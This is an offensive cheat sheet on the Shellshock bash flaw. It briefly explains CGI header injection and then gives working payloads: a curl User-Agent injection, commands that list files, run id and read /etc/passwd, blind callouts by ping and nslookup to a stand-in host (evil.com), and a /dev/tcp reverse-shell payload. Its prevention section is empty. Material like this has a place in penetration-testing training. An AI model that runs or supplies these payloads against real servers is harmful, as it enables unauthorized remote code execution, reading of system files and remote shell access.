Shellshock

What is it?

Shellshock is a software configuration flaw within how bash handled functions being defined within environment variables (Request Headers) and exported them. Web Servers that utilized /bin/sh on the back end, utilized CGI scripts, or used popen() or system() functions are vulnerable to this exploit. (@lcamtuf) The alternative use is to use /bin/dash which does not have the vulnerability.

An example is a site (e.g http://test.com/serverstats.cgi) that runs a /bin/bash script. By looking at the site's source performs a simple GET requests that runs the a script but since its using /bin/bash, by modifying the User Agent, Referer, or Cookie headers we can get RCE on server side.

Use echo for padding as servers can return a 500 error if not used.

HTTP_USER_AGENT='() { :;};echo;/usr/bin/id'
# HTTP_USER_AGENT' is CGI Environment Variable, rest is the shellshock injection

# () { :;} is the Shellshock Prefix. Indicates variable is a BASH function. : means do nothing on BASH.
# ;echo is padding. When injecting into HTTP Headers prepending the command with an echo can help avoid server errors.
# ;/usr/bin/id is the command that will be executed. Ping or nslookup could be used for blind injections.

Exploiting

You can use Curl command or Burp Repeater for fast modifications

Burp

Curl

curl -A "() { :;};echo;/bin/ls -la /" http://$IP/test

Cheat Sheet

Shellshock Inject Payloads

() { :;};echo;/bin/ls -la / # View files on root directory
() { :;};echo;/usr/bin/id # See user running server
() { :;};echo;/bin/cat /etc/passwd # Enumerate users

Blind Shellsheck Injection

() { :;};echo; ping -c 4 <YourIP>
() { :;};echo; nslookup abc123.evil.com

Reverse Shell Payload

() { :;};echo;/bin/bash -i > /dev/tcp/<YourIP>/9000 0<&1 2>&1

Display Kernel Version

() { :;};echo;/bin/uname -a

Prevention

References